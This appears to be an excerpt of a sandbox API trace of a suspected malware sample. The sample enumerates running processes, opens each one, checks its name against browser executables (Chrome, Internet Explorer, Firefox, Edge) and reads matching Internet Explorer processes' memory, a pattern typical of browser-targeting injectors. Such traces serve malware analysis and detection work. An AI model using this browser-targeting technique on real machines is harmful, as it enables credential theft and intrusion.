	[0255.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xb158
	[0255.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.963] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0255.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.963] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.964] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0255.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.964] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.964] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0255.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0255.965] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0255.966] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xb15c
	[0255.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.966] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0255.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.967] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.967] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0255.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.968] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.969] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0255.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xb160
	[0255.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.970] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0255.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.970] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.970] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0255.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.970] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.971] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0255.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xb164
	[0255.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.972] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0255.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.972] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.972] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0255.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.973] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.973] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0255.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xb168
	[0255.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.974] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0255.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.974] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.974] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0255.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.975] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.975] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0255.976] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xb16c
	[0255.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.976] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0255.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.976] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.977] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0255.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.977] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.978] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0255.979] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xb170
	[0255.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.979] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0255.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.979] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.979] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0255.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.980] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.980] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0255.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xb174
	[0255.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.981] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0255.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.981] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.982] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0255.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.982] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.983] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0255.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xb178
	[0255.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.983] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0255.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.984] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.984] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0255.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.985] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.985] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0255.986] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xb17c
	[0255.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.986] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0255.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.986] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.987] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0255.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.987] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.987] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0255.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xb180
	[0255.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.988] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0255.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.988] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.988] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0255.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.989] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.989] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0255.990] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xb184
	[0255.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.990] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0255.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.990] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.991] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0255.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.991] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.991] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0255.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xb188
	[0255.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.992] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0255.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.993] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.994] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0255.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.994] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.994] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0255.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xb18c
	[0255.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.995] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0255.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.996] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.997] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0255.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.997] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.998] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0255.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xb190
	[0255.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.998] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0255.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.999] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.000] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0256.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.000] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.001] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0256.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xb194
	[0256.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.002] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0256.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.002] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.003] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0256.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.003] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.004] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0256.004] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xb198
	[0256.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.004] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0256.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.005] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0256.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.005] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0256.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.005] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.005] NtQueryInformationProcess (in: ProcessHandle=0xb198, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0256.006] ReadProcessMemory (in: hProcess=0xb198, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0256.006] ReadProcessMemory (in: hProcess=0xb198, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0256.006] ReadProcessMemory (in: hProcess=0xb198, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0256.006] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0256.006] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0256.007] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xb19c
	[0256.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.007] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0256.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.007] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0256.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.008] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0256.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.008] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.008] NtQueryInformationProcess (in: ProcessHandle=0xb19c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0256.008] ReadProcessMemory (in: hProcess=0xb19c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0256.008] ReadProcessMemory (in: hProcess=0xb19c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0256.008] ReadProcessMemory (in: hProcess=0xb19c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0256.008] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0256.009] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0256.009] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xb1a0
	[0256.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.010] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0256.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.010] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.010] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0256.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.010] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.011] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0256.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xb1a4
	[0256.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.012] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0256.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.012] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.013] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0256.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.013] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.013] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xb1a8
	[0256.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.014] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.015] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.015] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.015] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.016] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xb1ac
	[0256.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.017] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.017] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.018] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.018] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
